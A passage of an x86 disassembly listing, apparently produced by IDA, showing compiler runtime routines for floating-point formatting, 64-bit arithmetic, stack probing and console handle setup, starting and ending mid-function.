call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_411163
loc_41114B: ; CODE XREF: sub_411113+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_411163: ; CODE XREF: sub_411113+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_41114B
cmp eax, 0FFFFFFFFh
jnz short loc_411173
or eax, eax
jmp short loc_41117E
; ---------------------------------------------------------------------------
loc_411173: ; CODE XREF: sub_411113+5A�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
loc_41117E: ; CODE XREF: sub_411113+5E�j
mov esi, [ebp+arg_C]
lea ecx, [ebp+var_2C]
push ecx
mov ecx, [ebp+var_28]
add ecx, esi
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
add eax, edi
push eax
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_4111A8
mov [edi], bl
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_4111A8: ; CODE XREF: sub_411113+8F�j
push [ebp+arg_10]
lea eax, [ebp+var_2C]
push ebx
push esi
push [ebp+arg_8]
mov ecx, edi
call sub_41101E
add esp, 10h
loc_4111BD: ; CODE XREF: sub_411113+4E�j
; sub_411113+93�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111CC proc near ; CODE XREF: sub_4112C4+4A�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 16h
pop edi
push edi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_30]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp esi, ebx
jnz short loc_41121F
loc_411204: ; CODE XREF: sub_4111CC+58�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
jmp loc_4112B5
; ---------------------------------------------------------------------------
loc_41121F: ; CODE XREF: sub_4111CC+36�j
mov ecx, [ebp+arg_8]
cmp ecx, ebx
jbe short loc_411204
mov eax, [ebp+var_2C]
dec eax
mov [ebp+var_20], eax
xor eax, eax
cmp [ebp+var_30], 2Dh
setz al
cmp ecx, 0FFFFFFFFh
lea edi, [eax+esi]
jnz short loc_411242
or ecx, ecx
jmp short loc_411244
; ---------------------------------------------------------------------------
loc_411242: ; CODE XREF: sub_4111CC+70�j
sub ecx, eax
loc_411244: ; CODE XREF: sub_4111CC+74�j
lea eax, [ebp+var_30]
push eax
push [ebp+arg_C]
push ecx
push edi
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_41125D
mov [esi], bl
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_41125D: ; CODE XREF: sub_4111CC+8B�j
mov eax, [ebp+var_2C]
dec eax
cmp [ebp+var_20], eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_411299
cmp eax, [ebp+arg_C]
jge short loc_411299
cmp cl, bl
jz short loc_41127F
loc_411275: ; CODE XREF: sub_4111CC+AE�j
mov al, [edi]
inc edi
test al, al
jnz short loc_411275
mov [edi-2], bl
loc_41127F: ; CODE XREF: sub_4111CC+A7�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push [ebp+arg_C]
mov ecx, esi
push [ebp+arg_8]
call sub_41101E
add esp, 10h
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_411299: ; CODE XREF: sub_4111CC+9E�j
; sub_4111CC+A3�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push eax
push [ebp+arg_10]
mov eax, esi
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_4112B5: ; CODE XREF: sub_4111CC+4E�j
; sub_4111CC+8F�j ...
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4111CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112C4 proc near ; CODE XREF: sub_41134A+17�p
; DATA XREF: sub_40F70B+37�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
cmp eax, 65h
jz short loc_41132E
cmp eax, 45h
jz short loc_41132E
cmp eax, 66h
jnz short loc_4112F2
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411113
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4112F2: ; CODE XREF: sub_4112C4+13�j
cmp eax, 61h
jz short loc_411315
cmp eax, 41h
jz short loc_411315
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4111CC
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_411315: ; CODE XREF: sub_4112C4+31�j
; sub_4112C4+36�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410CAD
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_41132E: ; CODE XREF: sub_4112C4+9�j
; sub_4112C4+E�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
loc_411345: ; CODE XREF: sub_4112C4+4F�j
; sub_4112C4+68�j
add esp, 18h
pop ebp
retn
sub_4112C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41134A proc near ; DATA XREF: sub_40F70B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4112C4
add esp, 1Ch
pop ebp
retn
sub_41134A endp
; =============== S U B R O U T I N E =======================================
sub_41136B proc near ; CODE XREF: sub_40F76B+16�p
push esi
push 30000h
push 10000h
xor esi, esi
push esi
call sub_4118FF
add esp, 0Ch
test eax, eax
jz short loc_411392
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_411392: ; CODE XREF: sub_41136B+18�j
pop esi
retn
sub_41136B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411394 proc near ; CODE XREF: sub_4113D0:loc_4113F4�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_41EE70
fstp [ebp+var_10]
fld ds:dbl_41EE68
fstp [ebp+var_18]
fld [ebp+var_18]
fdiv [ebp+var_10]
fmul [ebp+var_10]
fsubr [ebp+var_18]
fstp [ebp+var_8]
fld1
fcomp [ebp+var_8]
fnstsw ax
test ah, 5
jp short loc_4113CC
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_4113CC: ; CODE XREF: sub_411394+31�j
xor eax, eax
leave
retn
sub_411394 endp
; =============== S U B R O U T I N E =======================================
sub_4113D0 proc near ; CODE XREF: sub_40F76B+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_41D0E4
test eax, eax
jz short loc_4113F4
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_41D0EC
test eax, eax
jz short loc_4113F4
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_4113F4: ; CODE XREF: sub_4113D0+D�j
; sub_4113D0+1D�j
jmp sub_411394
sub_4113D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411400 proc near ; CODE XREF: sub_4104B0+11�j
; .kSjx934:004104D7�j ...
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_411414: ; CODE XREF: sub_411400+29�j
cmp ecx, eax
jb short loc_411422
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_411422: ; CODE XREF: sub_411400+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_411414
sub_411400 endp
; =============== S U B R O U T I N E =======================================
sub_41142B proc near ; CODE XREF: sub_4104DC+24�p
xor eax, eax
push eax
push eax
push 3
push eax
push 3
push 40000000h
push offset aConout ; "CONOUT$"
call ds:dword_41D06C
mov ds:dword_424224, eax
retn
sub_41142B endp
; =============== S U B R O U T I N E =======================================
sub_41144A proc near ; DATA XREF: .kSjx934:0041D2E0�o
mov eax, ds:dword_424224
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_41D0DC
jz short loc_411463
cmp eax, 0FFFFFFFEh
jz short loc_411463
push eax
call esi
loc_411463: ; CODE XREF: sub_41144A+F�j
; sub_41144A+14�j
mov eax, ds:dword_424220
cmp eax, 0FFFFFFFFh
jz short loc_411475
cmp eax, 0FFFFFFFEh
jz short loc_411475
push eax
call esi
loc_411475: ; CODE XREF: sub_41144A+21�j
; sub_41144A+26�j
pop esi
retn
sub_41144A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411480 proc near ; CODE XREF: sub_410CAD+102�p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_4114A7
xor eax, eax
jmp short loc_4114A9
; ---------------------------------------------------------------------------
loc_4114A7: ; CODE XREF: sub_411480+21�j
mov eax, edi
loc_4114A9: ; CODE XREF: sub_411480+25�j
cld
pop edi
leave
retn
sub_411480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114AD proc near ; CODE XREF: sub_4109C4+15�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411969
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_41152A
cmp eax, 1
jnz short loc_411515
loc_411504: ; CODE XREF: sub_4114AD+87�j
cmp [ebp+var_18], bl
jz short loc_411510
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411510: ; CODE XREF: sub_4114AD+5A�j
push 3
loc_411512: ; CODE XREF: sub_4114AD+7B�j
pop eax
jmp short loc_411544
; ---------------------------------------------------------------------------
loc_411515: ; CODE XREF: sub_4114AD+55�j
cmp eax, 2
jnz short loc_411536
loc_41151A: ; CODE XREF: sub_4114AD+81�j
cmp [ebp+var_18], bl
jz short loc_411526
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411526: ; CODE XREF: sub_4114AD+70�j
push 4
jmp short loc_411512
; ---------------------------------------------------------------------------
loc_41152A: ; CODE XREF: sub_4114AD+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_41151A
test byte ptr [ebp+var_14], 2
jnz short loc_411504
loc_411536: ; CODE XREF: sub_4114AD+6B�j
cmp [ebp+var_18], bl
jz short loc_411542
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411542: ; CODE XREF: sub_4114AD+8C�j
xor eax, eax
loc_411544: ; CODE XREF: sub_4114AD+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4114AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411553 proc near ; CODE XREF: sub_4109C4+2E�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411EAB
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_4115D0
cmp eax, 1
jnz short loc_4115BB
loc_4115AA: ; CODE XREF: sub_411553+87�j
cmp [ebp+var_18], bl
jz short loc_4115B6
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115B6: ; CODE XREF: sub_411553+5A�j
push 3
loc_4115B8: ; CODE XREF: sub_411553+7B�j
pop eax
jmp short loc_4115EA
; ---------------------------------------------------------------------------
loc_4115BB: ; CODE XREF: sub_411553+55�j
cmp eax, 2
jnz short loc_4115DC
loc_4115C0: ; CODE XREF: sub_411553+81�j
cmp [ebp+var_18], bl
jz short loc_4115CC
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115CC: ; CODE XREF: sub_411553+70�j
push 4
jmp short loc_4115B8
; ---------------------------------------------------------------------------
loc_4115D0: ; CODE XREF: sub_411553+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_4115C0
test byte ptr [ebp+var_14], 2
jnz short loc_4115AA
loc_4115DC: ; CODE XREF: sub_411553+6B�j
cmp [ebp+var_18], bl
jz short loc_4115E8
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115E8: ; CODE XREF: sub_411553+8C�j
xor eax, eax
loc_4115EA: ; CODE XREF: sub_411553+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115F9 proc near ; CODE XREF: sub_410BC1+96�p
; sub_411113+85�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_C]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ecx+0Ch]
jnz short loc_41162C
loc_41160E: ; CODE XREF: sub_4115F9+36�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_411618: ; CODE XREF: sub_4115F9+59�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp loc_4116B1
; ---------------------------------------------------------------------------
loc_41162C: ; CODE XREF: sub_4115F9+13�j
cmp [ebp+arg_4], ebx
jbe short loc_41160E
mov edx, [ebp+arg_8]
cmp edx, ebx
mov [esi], bl
jle short loc_41163E
mov eax, edx
jmp short loc_411640
; ---------------------------------------------------------------------------
loc_41163E: ; CODE XREF: sub_4115F9+3F�j
xor eax, eax
loc_411640: ; CODE XREF: sub_4115F9+43�j
inc eax
cmp [ebp+arg_4], eax
ja short loc_411654
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_411618
; ---------------------------------------------------------------------------
loc_411654: ; CODE XREF: sub_4115F9+4B�j
cmp edx, ebx
mov byte ptr [esi], 30h
lea eax, [esi+1]
jle short loc_411678
loc_41165E: ; CODE XREF: sub_4115F9+7A�j
mov cl, [edi]
cmp cl, bl
jz short loc_41166A
movsx ecx, cl
inc edi
jmp short loc_41166D
; ---------------------------------------------------------------------------
loc_41166A: ; CODE XREF: sub_4115F9+69�j
push 30h
pop ecx
loc_41166D: ; CODE XREF: sub_4115F9+6F�j
mov [eax], cl
inc eax
dec edx
cmp edx, ebx
jg short loc_41165E
mov ecx, [ebp+arg_C]
loc_411678: ; CODE XREF: sub_4115F9+63�j
cmp edx, ebx
mov [eax], bl
jl short loc_411690
cmp byte ptr [edi], 35h
jl short loc_411690
jmp short loc_411688
; ---------------------------------------------------------------------------
loc_411685: ; CODE XREF: sub_4115F9+93�j
mov byte ptr [eax], 30h
loc_411688: ; CODE XREF: sub_4115F9+8A�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_411685
inc byte ptr [eax]
loc_411690: ; CODE XREF: sub_4115F9+83�j
; sub_4115F9+88�j
cmp byte ptr [esi], 31h
jnz short loc_41169A
inc dword ptr [ecx+4]
jmp short loc_4116AF
; ---------------------------------------------------------------------------
loc_41169A: ; CODE XREF: sub_4115F9+9A�j
lea edi, [esi+1]
push edi
call sub_404130
inc eax
push eax
push edi
push esi
call sub_407370
add esp, 10h
loc_4116AF: ; CODE XREF: sub_4115F9+9F�j
xor eax, eax
loc_4116B1: ; CODE XREF: sub_4115F9+2E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4115F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116B6 proc near ; CODE XREF: sub_411771+24�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
movzx eax, word ptr [edx+6]
push ebx
mov ecx, eax
push esi
push edi
shr ecx, 4
and eax, 8000h
mov edi, 7FFh
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_411704
cmp ebx, edi
jz short loc_4116FD
add ecx, 3C00h
jmp short loc_411725
; ---------------------------------------------------------------------------
loc_4116FD: ; CODE XREF: sub_4116B6+3D�j
mov edi, 7FFFh
jmp short loc_411728
; ---------------------------------------------------------------------------
loc_411704: ; CODE XREF: sub_4116B6+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41171C
cmp edx, ebx
jnz short loc_41171C
mov eax, [ebp+arg_0]
mov cx, word ptr [ebp+arg_4]
mov [eax+4], ebx
mov [eax], ebx
jmp short loc_411768
; ---------------------------------------------------------------------------
loc_41171C: ; CODE XREF: sub_4116B6+52�j
; sub_4116B6+56�j
add ecx, 3C01h
mov [ebp+var_4], ebx
loc_411725: ; CODE XREF: sub_4116B6+45�j
movzx edi, cx
loc_411728: ; CODE XREF: sub_4116B6+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_411763
loc_411744: ; CODE XREF: sub_4116B6+AB�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
add edx, edx
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_411744
loc_411763: ; CODE XREF: sub_4116B6+8C�j
mov ecx, [ebp+arg_4]
or ecx, edi
loc_411768: ; CODE XREF: sub_4116B6+64�j
pop edi
pop esi
mov [eax+8], cx
pop ebx
leave
retn
sub_4116B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411771 proc near ; CODE XREF: sub_410BC1+2A�p
; sub_411113+2A�p ...
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
push ebx
mov ebx, [ebp+arg_8]
push esi
mov [ebp+var_30], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4116B6
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_412AB1
mov esi, [ebp+var_30]
mov [ebx+8], eax
movsx eax, [ebp+var_2A]
mov [ebx], eax
movsx eax, [ebp+var_2C]
mov [ebx+4], eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_10]
push esi
call sub_4076D5
add esp, 24h
test eax, eax
jz short loc_4117EB
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_4117EB: ; CODE XREF: sub_411771+69�j
mov ecx, [ebp+var_4]
pop edi
mov [ebx+0Ch], esi
pop esi
mov eax, ebx
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411771 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411800 proc near ; CODE XREF: sub_410CAD+2F7�p
; sub_410CAD+31D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebp
xor edi, edi
xor ebp, ebp
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_411824
inc edi
inc ebp
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_411824: ; CODE XREF: sub_411800+D�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_411840
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_411840: ; CODE XREF: sub_411800+2A�j
or eax, eax
jnz short loc_41186C
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+0Ch+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+0Ch+arg_8]
add edx, ecx
jmp short loc_4118B3
; ---------------------------------------------------------------------------
loc_41186C: ; CODE XREF: sub_411800+42�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41187A: ; CODE XREF: sub_411800+84�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41187A
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4118A8
cmp edx, [esp+0Ch+arg_4]
ja short loc_4118A8
jb short loc_4118B1
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4118B1
loc_4118A8: ; CODE XREF: sub_411800+98�j
; sub_411800+9E�j
dec esi
sub eax, [esp+0Ch+arg_8]
sbb edx, [esp+0Ch+arg_C]
loc_4118B1: ; CODE XREF: sub_411800+A0�j
; sub_411800+A6�j
xor ebx, ebx
loc_4118B3: ; CODE XREF: sub_411800+6A�j
sub eax, [esp+0Ch+arg_0]
sbb edx, [esp+0Ch+arg_4]
dec ebp
jns short loc_4118C5
neg edx
neg eax
sbb edx, 0
loc_4118C5: ; CODE XREF: sub_411800+BC�j
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
dec edi
jnz short loc_4118D9
neg edx
neg eax
sbb edx, 0
loc_4118D9: ; CODE XREF: sub_411800+D0�j
pop ebp
pop esi
pop edi
retn 10h
sub_411800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4118E0 proc near ; CODE XREF: sub_410CAD+1EA�p
; sub_410CAD+23E�p ...
cmp cl, 40h
jnb short loc_4118FA
cmp cl, 20h
jnb short loc_4118F0
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
loc_4118F0: ; CODE XREF: sub_4118E0+8�j
mov eax, edx
xor edx, edx
and cl, 1Fh
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_4118FA: ; CODE XREF: sub_4118E0+3�j
xor eax, eax
xor edx, edx
retn
sub_4118E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118FF proc near ; CODE XREF: sub_41136B+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
and eax, 0FFF7FFFFh
and ecx, eax
test ecx, 0FCF0FCE0h
push esi
jz short loc_411949
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_41192D
push esi
push esi
call sub_4134A7
pop ecx
pop ecx
mov [edi], eax
loc_41192D: ; CODE XREF: sub_4118FF+21�j
call sub_4057D3
push 16h
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
pop edi
jmp short loc_411966
; ---------------------------------------------------------------------------
loc_411949: ; CODE XREF: sub_4118FF+17�j
mov esi, [ebp+arg_0]
test esi, esi
push eax
push [ebp+arg_4]
jz short loc_41195D
call sub_4134A7
mov [esi], eax
jmp short loc_411962
; ---------------------------------------------------------------------------
loc_41195D: ; CODE XREF: sub_4118FF+53�j
call sub_4134A7
loc_411962: ; CODE XREF: sub_4118FF+5C�j
pop ecx
pop ecx
xor eax, eax
loc_411966: ; CODE XREF: sub_4118FF+48�j
pop esi
pop ebp
retn
sub_4118FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411969 proc near ; CODE XREF: sub_4114AD+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_4119D3
xor ebx, ebx
xor eax, eax
loc_4119B0: ; CODE XREF: sub_411969+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_4119C3
inc eax
cmp eax, 3
jl short loc_4119B0
xor eax, eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119C3: ; CODE XREF: sub_411969+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119D3: ; CODE XREF: sub_411969+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, ds:dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411A0B
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411A0B: ; CODE XREF: sub_411969+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411AB1
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411A39
